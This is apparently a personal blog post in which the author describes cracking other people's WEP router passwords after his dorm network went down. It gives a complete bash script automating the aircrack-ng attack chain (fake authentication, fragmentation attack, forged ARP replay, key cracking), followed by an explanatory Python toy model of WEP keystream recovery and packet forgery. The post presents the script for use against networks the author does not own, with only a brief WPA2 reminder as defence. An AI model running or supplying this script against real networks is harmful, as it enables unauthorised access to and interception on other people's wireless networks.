A few days ago the network in my dorm went down and I hadn't recharged my account yet, so my mind wandered to a bad idea: could I crack someone else's wireless router password?
I searched around online and followed tutorials, using aircrack-ng; I managed to crack 2 WEP keys, but it also ate up quite a lot of time.
I tidied up the whole process and wrote it as a simple script:
The channel defaults to 6 and the key length defaults to 64 bits. None of the steps is hard, but you do need patience.
A friendly reminder: if you use wireless, set the encryption to WPA2, which is still secure for now. WEP falls to this script because its RC4 keystream leaks from known plaintext (the LLC/SNAP header that starts every ARP frame) and its 24-bit IVs repeat, so enough captured IVs statistically reveal the key; WPA2 has neither weakness, though a WPA2-PSK passphrase still has to be a non-dictionary one, because the four-way handshake can be attacked offline.

gentoo-pjq 320 # cat crackwep.sh
#!/bin/bash
#########################################################################
# Author: [email protected]
# Created Time: Fri 09 Oct 2009 09:37:43 PM CST
# File Name: crackwep.sh
# Description:Welcome to visit:www.impjq.net for more information.
#########################################################################
# Interactive wrapper around the aircrack-ng WEP workflow:
# monitor mode -> capture -> fake auth -> fragmentation attack -> forge ARP
# -> replay to generate IVs -> crack.  Run as root from an empty directory.

CHANNEL=6
IFACE=wlan0
MON=mon0          # newer airmon-ng versions name the monitor interface wlan0mon instead
TMP=tmp.txt

# Ctrl+C is used below to stop airodump-ng/aireplay-ng; with a trap installed,
# bash runs the trap and continues instead of dying with the interrupted child.
trap ':' INT

# Abort unless the user answers y/Y at a checkpoint.
confirm() {
    read -p "$1 (y/n): " RESULT
    case "${RESULT}" in
        y|Y) ;;
        *) echo "Aborting."; exit 1 ;;
    esac
}

echo "start ${IFACE} monitor: airmon-ng start ${IFACE} ${CHANNEL}"
airmon-ng stop mon0
airmon-ng stop mon1
rm -f pack-*.cap pack-*.ivs    # a stale capture would make airodump-ng write pack-02.ivs
airmon-ng start ${IFACE} ${CHANNEL}
confirm "start monitor ok?"

echo "Display the details on the channel: airodump-ng --ivs -w pack -c ${CHANNEL} ${MON} &>${TMP}"
echo "Please wait for about 30 seconds, then Ctrl+C to interrupt it."
echo "Use tail -f ${TMP} in another terminal to see the details."
airodump-ng --ivs -w pack -c ${CHANNEL} ${MON} &>"${TMP}"
echo "cat ${TMP}"
cat "${TMP}"

read -p "Please input ESSID: " ESSID
# The BSSID is the first MAC address on the matching airodump-ng line; matching
# it with grep -o avoids depending on the exact column spacing of the output.
AP_MAC=$(grep "${ESSID}" "${TMP}" | grep -o -E '([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}' | head -n 1)
echo "AP_MAC: ${AP_MAC}"
[ -n "${AP_MAC}" ] || { echo "ESSID ${ESSID} not found in ${TMP}"; exit 1; }

# Our own MAC from sysfs, instead of counting ifconfig columns.
PC_MAC=$(cat /sys/class/net/${IFACE}/address)
echo "PC_MAC: ${PC_MAC}"

echo "Fake authentication: aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} ${MON}"
aireplay-ng -1 0 -e "${ESSID}" -a ${AP_MAC} -h ${PC_MAC} ${MON}
confirm "Association successful?"

echo "Delete any old fragment-xxxx-xxxx.xor file first: rm -f fragment*.xor"
rm -f fragment*.xor

echo "Fragmentation attack: aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} ${MON}"
aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} ${MON}

echo "Check whether the fragment-xxxx-xxxx.xor file was created:"
ls -lht *.xor
confirm "fragment-xxxx-xxxx.xor file created?"
XOR=$(ls -t fragment*.xor | head -n 1)   # newest keystream file, in case several exist

echo "packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y ${XOR} -w mrarp"
packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y "${XOR}" -w mrarp

# airodump-ng must be capturing while the forged ARP is replayed, otherwise no
# new IVs are written; run it in the background and stop it after the replay.
echo "Capturing in the background: airodump-ng --ivs -w pack -c ${CHANNEL} ${MON} &>${TMP}"
echo "**************************************************************************"
echo "Run tail -f ${TMP} in another terminal and wait for #Data to grow past 10000,"
echo "then Ctrl+C the replay."
echo "**************************************************************************"
airodump-ng --ivs -w pack -c ${CHANNEL} ${MON} &>"${TMP}" &
DUMP_PID=$!
echo "aireplay-ng -2 -r mrarp -x 256 ${MON}"
aireplay-ng -2 -r mrarp -x 256 ${MON}
kill ${DUMP_PID} 2>/dev/null
wait ${DUMP_PID} 2>/dev/null

echo "Run: aircrack-ng -n 64 -b ${AP_MAC} pack-01.ivs to get the key!"
echo "**************************************************************************"
echo "Get the key:"
ls -lht *.ivs
read -p "Input the pack file name, like pack-01.ivs: " RESULT
read -p "Key length 64/128 (64): " TYPE
TYPE=${TYPE:-64}
echo "aircrack-ng -n ${TYPE} -b ${AP_MAC} ${RESULT}"
aircrack-ng -n ${TYPE} -b ${AP_MAC} "${RESULT}"

The script is still very basic for now: it just strings the commands of the whole process together, which is generally enough for my own use.
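The script above only drives the aircrack-ng tools; what the fragment-xxxx-xxxx.xor file actually contains, and why packetforge-ng can build a valid ARP frame without ever knowing the key, is easier to see in a toy model. The following Python is an added example written for this page, not code from the original post or from aircrack-ng. It implements WEP (RC4 keyed with IV||secret, CRC-32 ICV) and a toy access point that decrypts, reassembles and re-encrypts fragments, then replays the attack chain: recover 8 keystream bytes from the known LLC/SNAP header of a sniffed ARP frame, grow them to 1500 bytes with chosen-plaintext fragments the way aireplay-ng -5 does, and forge a broadcast ARP request under a captured IV the way packetforge-ng -0 does. The 40-bit key, the IVs, the MAC address and the frame contents are all constructed for the demo.

```python
# Added example (not from the original post nor from aircrack-ng): a toy WEP
# model showing why the fragment-*.xor, packetforge-ng and aireplay-ng -2 steps
# work. The key, IVs and frame contents below are constructed for the demo.
import struct
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # fixed 8-byte prefix of every ARP frame

def rc4(key: bytes, n: int) -> bytes:
    """RC4 KSA + PRGA: n keystream bytes for `key`. WEP uses key = IV || secret."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(payload: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian (a checksum, not a MAC)."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)

def wep_encrypt(secret: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body: IV(3) | key-id(1) | RC4(IV||secret) XOR (payload || ICV)."""
    pt = payload + icv(payload)
    return iv + b"\x00" + xor(pt, rc4(iv + secret, len(pt)))

def wep_decrypt(secret: bytes, body: bytes):
    """What the AP does with a received frame: returns (payload, icv_ok)."""
    iv, ct = body[:3], body[4:]
    pt = xor(ct, rc4(iv + secret, len(ct)))
    return pt[:-4], pt[-4:] == icv(pt[:-4])

def recover_keystream(body: bytes, known_pt: bytes):
    """Known plaintext gives (IV, keystream prefix): the pair a fragment-*.xor file holds."""
    return body[:3], xor(body[4:4 + len(known_pt)], known_pt)

def forge_frame(iv: bytes, ks: bytes, payload: bytes) -> bytes:
    """packetforge-ng's trick: encrypt a chosen payload under a captured IV with only
    the recovered keystream. The secret key is never needed."""
    pt = payload + icv(payload)
    if len(ks) < len(pt):
        raise ValueError(f"need {len(pt)} keystream bytes, have {len(ks)}")
    return iv + b"\x00" + xor(pt, ks)

def ap_relay(secret: bytes, fragments, new_iv: bytes) -> bytes:
    """Toy AP: decrypt each fragment, drop on bad ICV, reassemble, re-encrypt with a fresh IV."""
    data = b""
    for frag in fragments:
        payload, ok = wep_decrypt(secret, frag)
        if not ok:
            raise ValueError("bad ICV: a real AP silently drops the fragment")
        data += payload
    return wep_encrypt(secret, new_iv, data)

def grow_keystream(secret: bytes, captured: bytes, target: int):
    """Fragmentation attack (aireplay-ng -5): from 8 known keystream bytes to `target`
    bytes by sending <= 16 chosen-plaintext fragments and reading the AP's relay."""
    iv, ks = recover_keystream(captured, LLC_SNAP_ARP)
    relay_iv = 0x010203                       # the toy AP hands out sequential fresh IVs
    while len(ks) < target:
        chunk = len(ks) - 4                   # data bytes per fragment; 4 go to the ICV
        chosen = bytes((7 * i + 3) & 0xFF for i in range(min(16 * chunk, target - 4)))
        frags = [forge_frame(iv, ks, chosen[i:i + chunk]) for i in range(0, len(chosen), chunk)]
        relayed = ap_relay(secret, frags, relay_iv.to_bytes(3, "big"))
        relay_iv += 1
        iv, ks = recover_keystream(relayed, chosen + icv(chosen))  # we chose the text, so we know all of it
    return iv, ks

def forge_arp_request(iv: bytes, ks: bytes, sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """The frame `packetforge-ng -0 -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor` writes."""
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + sender_mac + sender_ip + bytes(6) + target_ip
    return forge_frame(iv, ks, LLC_SNAP_ARP + arp)

def demo():
    secret = bytes.fromhex("0102030405")          # constructed 64-bit WEP key (40 secret bits)
    # One sniffed ARP frame from a legitimate client: LLC/SNAP header + 28-byte ARP body.
    captured = wep_encrypt(secret, b"\xaa\xbb\xcc", LLC_SNAP_ARP + bytes(range(28)))
    iv, ks8 = recover_keystream(captured, LLC_SNAP_ARP)
    seed_ok = ks8 == rc4(iv + secret, 8)          # recovered bytes are the real keystream
    iv2, ks = grow_keystream(secret, captured, 1500)
    frame = forge_arp_request(iv2, ks, bytes.fromhex("00163e000001"), bytes([255] * 4), bytes([255] * 4))
    payload, ok = wep_decrypt(secret, frame)      # AP accepts it, so every replay yields a new IV
    return len(ks8), len(ks), seed_ok, ok, payload[:8] == LLC_SNAP_ARP
```

demo() returns (8, 1500, True, True, True): the 8 seed bytes equal the real RC4 keystream for that IV, three relay rounds (8 -> 68 -> 1028 -> 1500 bytes) are enough for a full MTU of keystream, and the forged ARP request passes the AP's ICV check. That last point is what makes the aireplay-ng -2 step productive: because the forged frame is valid, the AP re-encrypts and relays it under a fresh IV on every replay, which is where the #Data counter in airodump-ng comes from.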

WEP password cracking script
